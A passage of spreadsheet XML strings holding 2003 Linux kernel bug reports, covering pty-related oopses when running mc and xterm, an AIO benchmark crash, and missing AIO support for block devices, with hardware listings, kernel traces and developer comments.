for(node=0; node&lt;maxnumnodes; node++) Node_online for pSereis is easy, use numa_node_exists[] array. I guess we need a asm-generic one, too. I have a rough version of this running right now, I'll send a patch asap.</t>
  </si>
  <si>
    <t>oups while running mc, not able to run xterm nor kterm in xfree86</t>
  </si>
  <si>
    <t>2.5.68-bk4</t>
  </si>
  <si>
    <t>2003-04-23 07:17 UTC</t>
  </si>
  <si>
    <t>2004-12-02 14:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: p4 2 ghz, 512MB x86 computer 00:00.0 Host bridge: Intel Corp. 82845G/GL [Brookdale-G] Chipset Host Bridge (rev 01) Subsystem: Intel Corp. 82845G/GL [Brookdale-G] Chipset Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=64M] Capabilities: &lt;available only to root&gt; 00:01.0 PCI bridge: Intel Corp. 82845G/GL [Brookdale-G] Chipset AGP Bridge (rev 01) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: e6000000-e7ffffff Prefetchable memory behind bridge: e4000000-e5ffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:1d.0 USB Controller: Intel Corp. 82801DB USB (Hub #1) (rev 01) (prog-if 00 [UHCI]) Subsystem: Intel Corp. 82801DB USB (Hub #1) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 12 Region 4: I/O ports at b800 [size=32] 00:1d.1 USB Controller: Intel Corp. 82801DB USB (Hub #2) (rev 01) (prog-if 00 [UHCI]) Subsystem: Intel Corp.: Unknown device 24c2 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 12 Region 4: I/O ports at b000 [size=32] 00:1d.2 USB Controller: Intel Corp. 82801DB USB (Hub #3) (rev 01) (prog-if 00 [UHCI]) Subsystem: Intel Corp.: Unknown device 24c2 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 11 Region 4: I/O ports at b400 [size=32] 00:1d.7 USB Controller: Intel Corp. 82801DB USB EHCI Controller (rev 01) (prog-if 20 [EHCI]) Subsystem: Giga-byte Technology: Unknown device 5004 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 9 Region 0: Memory at ea000000 (32-bit, non-prefetchable) [size=1K] Capabilities: &lt;available only to root&gt; 00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB PCI Bridge (rev 81) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 I/O behind bridge: 0000a000-0000afff Memory behind bridge: e8000000-e9ffffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corp. 82801DB ISA Bridge (LPC) (rev 01) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corp. 82801DB ICH4 IDE (rev 01) (prog-if 8a [Master SecP PriP]) Subsystem: Intel Corp.: Unknown device 24c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at &lt;ignored&gt; Region 1: I/O ports at &lt;ignored&gt; Region 2: I/O ports at &lt;ignored&gt; Region 3: I/O ports at &lt;ignored&gt; Region 4: I/O ports at cc00 [size=16] Region 5: Memory at 20000000 (32-bit, non-prefetchable) [size=1K] 00:1f.3 SMBus: Intel Corp. 82801DB SMBus (rev 01) Subsystem: Intel Corp.: Unknown device 24c2 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 5 Region 4: I/O ports at 5000 [size=32] 00:1f.5 Multimedia audio controller: Intel Corp. 82801DB AC'97 Audio (rev 01) Subsystem: Giga-byte Technology: Unknown device a002 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 5 Region 0: I/O ports at d400 [size=256] Region 1: I/O ports at d800 [size=64] Region 2: Memory at ea002000 (32-bit, non-prefetchable) [size=512] Region 3: Memory at ea003000 (32-bit, non-prefetchable) [size=256] Capabilities: &lt;available only to root&gt; 01:00.0 VGA compatible controller: nVidia Corporation NV5M64 [RIVA TNT2 Model 64/Model 64 Pro] (rev 15) (prog-if 00 [VGA]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 12 Region 0: Memory at e6000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at e4000000 (32-bit, prefetchable) [size=32M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: &lt;available only to root&gt; 02:02.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 08) Subsystem: Compaq Computer Corporation NC3123 Fast Ethernet NIC (WOL) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min, 14000ns max), cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at e9100000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at a000 [size=64] Region 2: Memory at e9000000 (32-bit, non-prefetchable) [size=1M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=1M] Capabilities: &lt;available only to root&gt; Software Environment: bash-2.05b$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.3/specs Configured with: ../src/configure -v --enable-languages=c,c++,java,f77,objc,ada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux Thread model: posix gcc version 3.2.3 20030415 (Debian prerelease) Problem Description: seems like pty-s are somewhat broken. Steps to reproduce: try to run mc, xinit or kterm oups : Apr 23 14:51:40 gregs kernel: Apr 23 14:51:40 gregs kernel: Code: 8b 43 1c 89 04 24 e8 e3 fb ff ff 89 1c 24 e8 b6 eb ff ff 89 Apr 23 14:51:40 gregs kernel: &lt;6&gt;note: mc[3688] exited with preempt_count 2 Apr 23 14:51:40 gregs kernel: bad: scheduling while atomic! Apr 23 14:51:40 gregs kernel: Call Trace: Apr 23 14:51:40 gregs kernel: [schedule+935/940] schedule+0x3a7/0x3ac Apr 23 14:51:40 gregs kernel: [unmap_page_range+73/135] unmap_page_range+0x49/0x87 Apr 23 14:51:40 gregs kernel: [unmap_vmas+441/551] unmap_vmas+0x1b9/0x227 Apr 23 14:51:40 gregs kernel: [exit_mmap+124/401] exit_mmap+0x7c/0x191 Apr 23 14:51:40 gregs kernel: [mmput+86/165] mmput+0x56/0xa5 Apr 23 14:51:40 gregs kernel: [do_exit+287/1041] do_exit+0x11f/0x411 Apr 23 14:51:40 gregs kernel: [do_divide_error+0/251] do_divide_error+0x0/0xfb Apr 23 14:51:40 gregs kernel: [do_page_fault+282/1059] do_page_fault+0x11a/0x423 Apr 23 14:51:40 gregs kernel: [devfs_lookup+377/563] devfs_lookup+0x179/0x233 Apr 23 14:51:40 gregs kernel: [d_alloc+32/454] d_alloc+0x20/0x1c6 Apr 23 14:51:40 gregs kernel: [_devfs_descend+132/193] _devfs_descend+0x84/0xc1 Apr 23 14:51:40 gregs kernel: [do_page_fault+0/1059] do_page_fault+0x0/0x423 Apr 23 14:51:40 gregs kernel: [error_code+45/56] error_code+0x2d/0x38 Apr 23 14:51:40 gregs kernel: [devfs_remove+104/133] devfs_remove+0x68/0x85 Apr 23 14:51:40 gregs kernel: [iput+98/124] iput+0x62/0x7c Apr 23 14:51:40 gregs kernel: [dput+34/483] dput+0x22/0x1e3 Apr 23 14:51:40 gregs kernel: [devpts_pty_kill+63/87] devpts_pty_kill+0x3f/0x57 Apr 23 14:51:40 gregs kernel: [pty_close+233/320] pty_close+0xe9/0x140 Apr 23 14:51:40 gregs kernel: [release_dev+2001/2070] release_dev+0x7d1/0x816 Apr 23 14:51:40 gregs kernel: [__user_walk+92/94] __user_walk+0x5c/0x5e Apr 23 14:51:40 gregs kernel: [vfs_stat+31/91] vfs_stat+0x1f/0x5b Apr 23 14:51:40 gregs kernel: [sys_statfs+158/188] sys_statfs+0x9e/0xbc Apr 23 14:51:40 gregs kernel: [tty_release+0/103] tty_release+0x0/0x67 Apr 23 14:51:40 gregs kernel: [tty_release+45/103] tty_release+0x2d/0x67 Apr 23 14:51:40 gregs kernel: [__fput+251/256] __fput+0xfb/0x100 Apr 23 14:51:40 gregs kernel: [filp_close+153/208] filp_close+0x99/0xd0 Apr 23 14:51:40 gregs kernel: [sys_close+100/152] sys_close+0x64/0x98 Apr 23 14:51:40 gregs kernel: [syscall_call+7/11] syscall_call+0x7/0xb Apr 23 14:51:40 gregs kernel: Apr 23 14:51:40 gregs modprobe: FATAL: Module /dev/pts/18 not found. Apr 23 14:51:40 gregs kernel: Unable to handle kernel NULL pointer dereference at virtual address 0000001c Apr 23 14:51:40 gregs kernel: printing eip: Apr 23 14:51:40 gregs kernel: c01c256f Apr 23 14:51:40 gregs kernel: *pde = 00000000 Apr 23 14:51:40 gregs kernel: Oops: 0000 [#19] Apr 23 14:51:40 gregs kernel: CPU: 0 Apr 23 14:51:40 gregs kernel: EIP: 0060:[devfs_remove+104/133] Not tainted Apr 23 14:51:40 gregs kernel: EFLAGS: 00010202 Apr 23 14:51:40 gregs kernel: EIP is at devfs_remove+0x68/0x85 Apr 23 14:51:40 gregs kernel: eax: d3742000 ebx: 00000000 ecx: d3743ea6 edx: 00000000 Apr 23 14:51:40 gregs kernel: esi: daedae80 edi: 00000012 ebp: d608c000 esp: d3743e90 Apr 23 14:51:40 gregs kernel: ds: 007b es: 007b ss: 0068 Apr 23 14:51:40 gregs kernel: Process mc (pid: 3691, threadinfo=d3742000 task=dc58b880) Apr 23 14:51:40 gregs kernel: Stack: 00000000 00000000 00000000 d3743ef0 2f737470 df003831 db108200 db108200 Apr 23 14:51:40 gregs kernel: c016e727 db108200 dfdd4e80 dfdd4e80 c016b8f6 dfdd4e80 c063c8f0 d4dcd780 Apr 23 14:51:40 gregs kernel: daedae80 00000012 c018dc70 d4dcd780 d5021000 c0365775 c05d616b 00000012 Apr 23 14:51:40 gregs kernel: Call Trace: Apr 23 14:51:40 gregs kernel: [iput+98/124] iput+0x62/0x7c Apr 23 14:51:40 gregs kernel: [dput+34/483] dput+0x22/0x1e3 Apr 23 14:51:40 gregs kernel: [devpts_pty_kill+63/87] devpts_pty_kill+0x3f/0x57 Apr 23 14:51:40 gregs kernel: [pty_close+233/320] pty_close+0xe9/0x140 Apr 23 14:51:40 gregs kernel: [release_dev+2001/2070] release_dev+0x7d1/0x816 Apr 23 14:51:40 gregs kernel: [__user_walk+92/94] __user_walk+0x5c/0x5e Apr 23 14:51:40 gregs kernel: [vfs_stat+31/91] vfs_stat+0x1f/0x5b Apr 23 14:51:40 gregs kernel: [sys_statfs+158/188] sys_statfs+0x9e/0xbc Apr 23 14:51:40 gregs kernel: [tty_release+0/103] tty_release+0x0/0x67 Apr 23 14:51:40 gregs kernel: [tty_release+45/103] tty_release+0x2d/0x67 Apr 23 14:51:40 gregs kernel: [__fput+251/256] __fput+0xfb/0x100 Apr 23 14:51:40 gregs kernel: [filp_close+153/208] filp_close+0x99/0xd0 Apr 23 14:51:40 gregs kernel: [sys_close+100/152] sys_close+0x64/0x98 Apr 23 14:51:40 gregs kernel: [syscall_call+7/11] syscall_call+0x7/0xb Apr 23 14:51:40 gregs kernel: Apr 23 14:51:40 gregs kernel: Code: 8b 43 1c 89 04 24 e8 e3 fb ff ff 89 1c 24 e8 b6 eb ff ff 89 Apr 23 14:51:40 gregs kernel: &lt;6&gt;note: mc[3691] exited with preempt_count 2 Apr 23 14:51:40 gregs kernel: bad: scheduling while atomic! Apr 23 14:51:40 gregs kernel: Call Trace: Apr 23 14:51:40 gregs kernel: [schedule+935/940] schedule+0x3a7/0x3ac Apr 23 14:51:40 gregs kernel: [unmap_page_range+73/135] unmap_page_range+0x49/0x87 Apr 23 14:51:40 gregs kernel: [unmap_vmas+441/551] unmap_vmas+0x1b9/0x227 Apr 23 14:51:40 gregs kernel: [exit_mmap+124/401] exit_mmap+0x7c/0x191 Apr 23 14:51:40 gregs kernel: [mmput+86/165] mmput+0x56/0xa5 Apr 23 14:51:40 gregs kernel: [do_exit+287/1041] do_exit+0x11f/0x411 Apr 23 14:51:40 gregs kernel: [do_divide_error+0/251] do_divide_error+0x0/0xfb Apr 23 14:51:40 gregs kernel: [do_page_fault+282/1059] do_page_fault+0x11a/0x423 Apr 23 14:51:40 gregs kernel: [devfs_lookup+377/563] devfs_lookup+0x179/0x233 Apr 23 14:51:40 gregs kernel: [d_alloc+32/454] d_alloc+0x20/0x1c6 Apr 23 14:51:40 gregs kernel: [_devfs_descend+132/193] _devfs_descend+0x84/0xc1 Apr 23 14:51:40 gregs kernel: [do_page_fault+0/1059] do_page_fault+0x0/0x423 Apr 23 14:51:40 gregs kernel: [error_code+45/56] error_code+0x2d/0x38 Apr 23 14:51:40 gregs kernel: [devfs_remove+104/133] devfs_remove+0x68/0x85 Apr 23 14:51:40 gregs kernel: [iput+98/124] iput+0x62/0x7c Apr 23 14:51:40 gregs kernel: [dput+34/483] dput+0x22/0x1e3 Apr 23 14:51:40 gregs kernel: [devpts_pty_kill+63/87] devpts_pty_kill+0x3f/0x57 Apr 23 14:51:40 gregs kernel: [pty_close+233/320] pty_close+0xe9/0x140 Apr 23 14:51:40 gregs kernel: [release_dev+2001/2070] release_dev+0x7d1/0x816 Apr 23 14:51:40 gregs kernel: [__user_walk+92/94] __user_walk+0x5c/0x5e Apr 23 14:51:40 gregs kernel: [vfs_stat+31/91] vfs_stat+0x1f/0x5b Apr 23 14:51:40 gregs kernel: [sys_statfs+158/188] sys_statfs+0x9e/0xbc Apr 23 14:51:40 gregs kernel: [tty_release+0/103] tty_release+0x0/0x67 Apr 23 14:51:40 gregs kernel: [tty_release+45/103] tty_release+0x2d/0x67 Apr 23 14:51:40 gregs kernel: [__fput+251/256] __fput+0xfb/0x100 Apr 23 14:51:40 gregs kernel: [filp_close+153/208] filp_close+0x99/0xd0 Apr 23 14:51:40 gregs kernel: [sys_close+100/152] sys_close+0x64/0x98 Apr 23 14:51:40 gregs kernel: [syscall_call+7/11] syscall_call+0x7/0xb Apr 23 14:51:40 gregs kernel: Apr 23 14:51:41 gregs modprobe: FATAL: Module /dev/pts/19 not found. Apr 23 14:51:41 gregs kernel: Unable to handle kernel NULL pointer dereference at virtual address 0000001c Apr 23 14:51:41 gregs kernel: printing eip: Apr 23 14:51:41 gregs kernel: c01c256f Apr 23 14:51:41 gregs kernel: *pde = 00000000 Apr 23 14:51:41 gregs kernel: Oops: 0000 [#20] Apr 23 14:51:41 gregs kernel: CPU: 0 Apr 23 14:51:41 gregs kernel: EIP: 0060:[devfs_remove+104/133] Not tainted Apr 23 14:51:41 gregs kernel: EFLAGS: 00010202 Apr 23 14:51:41 gregs kernel: EIP is at devfs_remove+0x68/0x85 Apr 23 14:51:41 gregs kernel: eax: d3742000 ebx: 00000000 ecx: d3743ea6 edx: 00000000 Apr 23 14:51:41 gregs kernel: esi: daeda400 edi: 00000013 ebp: d47ea000 esp: d3743e90 Apr 23 14:51:41 gregs kernel: ds: 007b es: 007b ss: 0068 Apr 23 14:51:41 gregs kernel: Process mc (pid: 3694, threadinfo=d3742000 task=dc58b880) Apr 23 14:51:41 gregs kernel: Stack: 00000000 00000000 00000000 d3743ef0 2f737470 df003931 db108080 db108080 Apr 23 14:51:41 gregs kernel: c016e727 db108080 dfdd4e80 dfdd4e80 c016b8f6 dfdd4e80 c063c8f0 d5196680 Apr 23 14:51:41 gregs kernel: daeda400 00000013 c018dc70 d5196680 dcb63000 c0365775 c05d616b 00000013 Apr 23 14:51:41 gregs kernel: Call Trace: Apr 23 14:51:41 gregs kernel: [iput+98/124] iput+0x62/0x7c Apr 23 14:51:41 gregs kernel: [dput+34/483] dput+0x22/0x1e3 Apr 23 14:51:41 gregs kernel: [devpts_pty_kill+63/87] devpts_pty_kill+0x3f/0x57 Apr 23 14:51:41 gregs kernel: [pty_close+233/320] pty_close+0xe9/0x140 Apr 23 14:51:41 gregs kernel: [release_dev+2001/2070] release_dev+0x7d1/0x816 Apr 23 14:51:41 gregs kernel: [__user_walk+92/94] __user_walk+0x5c/0x5e Apr 23 14:51:41 gregs kernel: [vfs_stat+31/91] vfs_stat+0x1f/0x5b Apr 23 14:51:41 gregs kernel: [sys_statfs+158/188] sys_statfs+0x9e/0xbc Apr 23 14:51:41 gregs kernel: [tty_release+0/103] tty_release+0x0/0x67 Apr 23 14:51:41 gregs kernel: [tty_release+45/103] tty_release+0x2d/0x67 Apr 23 14:51:41 gregs kernel: [__fput+251/256] __fput+0xfb/0x100 Apr 23 14:51:41 gregs kernel: [filp_close+153/208] filp_close+0x99/0xd0 Apr 23 14:51:41 gregs kernel: [sys_close+100/152] sys_close+0x64/0x98 Apr 23 14:51:41 gregs kernel: [syscall_call+7/11] syscall_call+0x7/0xb Apr 23 14:51:41 gregs kernel: Apr 23 14:51:41 gregs kernel: Code: 8b 43 1c 89 04 24 e8 e3 fb ff ff 89 1c 24 e8 b6 eb ff ff 89 Apr 23 14:51:41 gregs kernel: &lt;6&gt;note: mc[3694] exited with preempt_count 2 Apr 23 14:51:41 gregs kernel: bad: scheduling while atomic! Apr 23 14:51:41 gregs kernel: Call Trace: Apr 23 14:51:41 gregs kernel: [schedule+935/940] schedule+0x3a7/0x3ac Apr 23 14:51:41 gregs kernel: [unmap_page_range+73/135] unmap_page_range+0x49/0x87 Apr 23 14:51:41 gregs kernel: [unmap_vmas+441/551] unmap_vmas+0x1b9/0x227 Apr 23 14:51:41 gregs kernel: [exit_mmap+124/401] exit_mmap+0x7c/0x191 Apr 23 14:51:41 gregs kernel: [mmput+86/165] mmput+0x56/0xa5 Apr 23 14:51:41 gregs kernel: [do_exit+287/1041] do_exit+0x11f/0x411 Apr 23 14:51:41 gregs kernel: [do_divide_error+0/251] do_divide_error+0x0/0xfb Apr 23 14:51:41 gregs kernel: [do_page_fault+282/1059] do_page_fault+0x11a/0x423 Apr 23 14:51:41 gregs kernel: [devfs_lookup+377/563] devfs_lookup+0x179/0x233 Apr 23 14:51:41 gregs kernel: [d_alloc+32/454] d_alloc+0x20/0x1c6 Apr 23 14:51:41 gregs kernel: [_devfs_descend+132/193] _devfs_descend+0x84/0xc1 Apr 23 14:51:41 gregs kernel: [do_page_fault+0/1059] do_page_fault+0x0/0x423 Apr 23 14:51:41 gregs kernel: [error_code+45/56] error_code+0x2d/0x38 Apr 23 14:51:41 gregs kernel: [devfs_remove+104/133] devfs_remove+0x68/0x85 Apr 23 14:51:41 gregs kernel: [iput+98/124] iput+0x62/0x7c Apr 23 14:51:41 gregs kernel: [dput+34/483] dput+0x22/0x1e3 Apr 23 14:51:41 gregs kernel: [devpts_pty_kill+63/87] devpts_pty_kill+0x3f/0x57 Apr 23 14:51:41 gregs kernel: [pty_close+233/320] pty_close+0xe9/0x140 Apr 23 14:51:41 gregs kernel: [release_dev+2001/2070] release_dev+0x7d1/0x816 Apr 23 14:51:41 gregs kernel: [__user_walk+92/94] __user_walk+0x5c/0x5e Apr 23 14:51:41 gregs kernel: [vfs_stat+31/91] vfs_stat+0x1f/0x5b Apr 23 14:51:41 gregs kernel: [sys_statfs+158/188] sys_statfs+0x9e/0xbc Apr 23 14:51:41 gregs kernel: [tty_release+0/103] tty_release+0x0/0x67 Apr 23 14:51:41 gregs kernel: [tty_release+45/103] tty_release+0x2d/0x67 Apr 23 14:51:41 gregs kernel: [__fput+251/256] __fput+0xfb/0x100 Apr 23 14:51:41 gregs kernel: [filp_close+153/208] filp_close+0x99/0xd0 Apr 23 14:51:41 gregs kernel: [sys_close+100/152] sys_close+0x64/0x98 Apr 23 14:51:41 gregs kernel: [syscall_call+7/11] syscall_call+0x7/0xb Apr 23 14:51:41 gregs kernel:</t>
  </si>
  <si>
    <t>[perf][rawiobench] oops when running aio benchmark</t>
  </si>
  <si>
    <t>AIO</t>
  </si>
  <si>
    <t>2003-04-23 14:39 UTC</t>
  </si>
  <si>
    <t>Steve Pratt</t>
  </si>
  <si>
    <t>2003-06-04 12:24 UTC</t>
  </si>
  <si>
    <t>also known as: https://bugzilla.linux.ibm.com/show_bug.cgi?id=2491 Please fill in each of the sections below. Hardware Environment:8500R 8x700 servraid scsi Software Environment:SLES8 + 2.5.66 kernel w/ O_DIRECT aio patch + badari's readahead patch Steps to Reproduce: 1.from clean booted kernel 2.rawread -m 16 -p 256 -d 6 -n 262144 -x -z -t 14 -s 1024 rawread benchmark can be found at (use version 1.1.1) http://www-124.ibm.com/developerworks/opensource/linuxperf/#Benchmarks 3.note (this test uses 16 scsi devices starting at sdf) Actual Results: CPU: 4 EIP: 0060:[&lt;c028e1eb&gt;] Not tainted EFLAGS: 00010202 EIP is at rb_insert_color+0x5b/0xf0 eax: 00000000 ebx: f629e3f8 ecx: f61d72e0 edx: f61d72f8 esi: 00000001 edi: f61d72f8 ebp: f628fb44 esp: c3917cc4 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c3916000 task=c391f880) Stack: c010b8fe 00000000 f61d72e0 f628fb40 00000001 f628fb40 c014556a f61d72f8 f628fb44 f629e404 f629e3f8 00000000 f628fb40 c0145637 f628fb40 f61d72e0 f629e420 f629e404 f629e3f8 f61d72e0 f628fb40 c0146f04 f628fb40 f61d72e0 Call Trace: [&lt;c010b8fe&gt;] reschedule_interrupt+0x1a/0x20 [&lt;c014556a&gt;] __vma_link+0x3a/0xa0 [&lt;c0145637&gt;] vma_link+0x67/0x90 [&lt;c0146f04&gt;] insert_vm_struct+0x74/0x80 [&lt;c01467d5&gt;] split_vma+0x105/0x130 [&lt;c01468ca&gt;] do_munmap+0xca/0x190 [&lt;c0173d72&gt;] aio_free_ring+0xb2/0xf0 [&lt;c01743bf&gt;] __put_ioctx+0x1f/0x70 [&lt;c0174be3&gt;] aio_complete+0x143/0x1a0 [&lt;c01390b1&gt;] mempool_free+0x41/0x80 [&lt;c0172b63&gt;] finished_one_bio+0x43/0x60 [&lt;c01576bd&gt;] bio_put+0x2d/0x40 [&lt;c0172eb8&gt;] dio_bio_complete+0x98/0xe0 [&lt;c0172bac&gt;] dio_bio_end_aio+0x2c/0x30 [&lt;c0157fee&gt;] bio_endio+0x4e/0x80 [&lt;c02e8f01&gt;] __end_that_request_first+0x221/0x250 [&lt;c032615b&gt;] scsi_end_request+0x3b/0xd0 [&lt;c0326520&gt;] scsi_io_completion+0x150/0x480 [&lt;c0324446&gt;] scsi_delete_timer+0x16/0x30 [&lt;c035a7ee&gt;] sd_rw_intr+0x4e/0x170 [&lt;c032149c&gt;] scsi_finish_command+0x8c/0xb0 [&lt;c03213a8&gt;] scsi_softirq+0xb8/0xe0 [&lt;c034a8d9&gt;] do_ipsintr+0x59/0x90 [&lt;c0123ac5&gt;] do_softirq+0xc5/0xd0 [&lt;c010d5bd&gt;] do_IRQ+0xed/0x100 [&lt;c0108b70&gt;] default_idle+0x0/0x50 [&lt;c0108b70&gt;] default_idle+0x0/0x50 [&lt;c010b8dc&gt;] common_interrupt+0x18/0x20 [&lt;c0108b70&gt;] default_idle+0x0/0x50 [&lt;c0108b70&gt;] default_idle+0x0/0x50 [&lt;c0108b9d&gt;] default_idle+0x2d/0x50 [&lt;c0108c3a&gt;] cpu_idle+0x3a/0x50 [&lt;c01202a4&gt;] printk+0x164/0x1a0 Code: c7 40 04 01 00 00 00 83 c4 08 5b 5e 5f 5d c3 8d b6 00 00 00 &lt;0&gt;Kernel panic: Aiee, killing interrupt handler! In interrupt handler - not syncing Expected Results: no ooops Additional Information: ------- Additional Comment #1 From Bill H. Hartner 2003-04-14 12:50 ------- Changed priority to BLOCK since rawreadbench does not run. ------- Additional Comment #2 From William L. Irwin III 2003-04-17 14:48 ------- Created an attachment (id=761) badari's fix for aio oopsen Fixes numerous aio oopsen. ------- Additional Comment #3 From William L. Irwin III 2003-04-17 15:11 ------- badari, it looks like you fixed it. I'm throwing it over the wall at you b/c I don't even know the testcaes (or the code involved) that well. I'm guessing all you'll have to do is fire up a browser and mark it resolved. ------- Additional Comment #4 From Badari Pulavarty 2003-04-21 17:40 ------- I ran "rawread" provided by Steve sucessfully on RAW &amp; Blockdevices on 2.5.66, with a small AIO fix. Please try this patch and re-open the problem if it happens again. ------- Additional Comment #5 From Bill H. Hartner 2003-04-23 09:01 ------- Reopened bug. ------- Additional Comment #6 From Bill H. Hartner 2003-04-23 09:05 ------- Resolved bug as FIX_BY_IBM. When Steve P. tests the patch and confirms that it fixes the problem then the status should be set to TESTED. When the patch makes it into the 2.5. kernel, the it should be closed.</t>
  </si>
  <si>
    <t>AIO not implemented for block devices</t>
  </si>
  <si>
    <t>2003-04-23 14:43 UTC</t>
  </si>
  <si>
    <t>2003-06-04 12:12 UTC</t>
  </si>
  <si>
    <t>also known as: https://bugzilla.linux.ibm.com/show_bug.cgi?id=2384 Hardware Environment: 8500R Software Environment: 2.5.66 Steps to Reproduce: 1.Attempt to do AIO against /dev/sd* 2. 3. Actual Results: -EINVAL Expected Results: Completes Additional Information: It appears the file_operations table for block devices does not have an entry for aio read or write. As such aio reads and write to these devices fail with EINVAL. RAW devices work fine. With the limit on the number of raw devices possible, it is important that we make AIO work for normal block devices. ------- Additional Comment #1 From Steven Pratt 2003-04-03 14:23 ------- Add aio entrypoint to file_operatrions table for block devices Patch provided by Janet for 2.5.66. ------- Additional Comment #2 From Steven Pratt 2003-04-03 14:25 ------- Tested patch for o_direct aio to block devices. Patch seems to work same as raw aio. ------- Additional Comment #3 From Bill H. Hartner 2003-04-17 08:21 ------- Accept bug for Janet. ------- Additional Comment #4 From Bill H. Hartner 2003-04-17 08:28 ------- Janet, if a patch has been provided for this bug, then it should be attached to the bug [create attachment] and the status changed to FIXEDAWAITINGTEST. Steve already attached the patch. I changed the status to FIXED by IBM. When Steve tests the patch and confirms that it solves the problem, then he will change the status to TESTED. Once the patch gets into the 2.5 kernel and verified by Steve, then the bug can be changed to the CLOSED state.</t>
  </si>
  <si>
    <t>Need configurable TASK_UNMAPPED_BASE per process</t>
  </si>
  <si>
    <t>2003-04-23 15:38 UTC</t>
  </si>
  <si>
    <t>Peter Wai Yee Wong</t>
  </si>
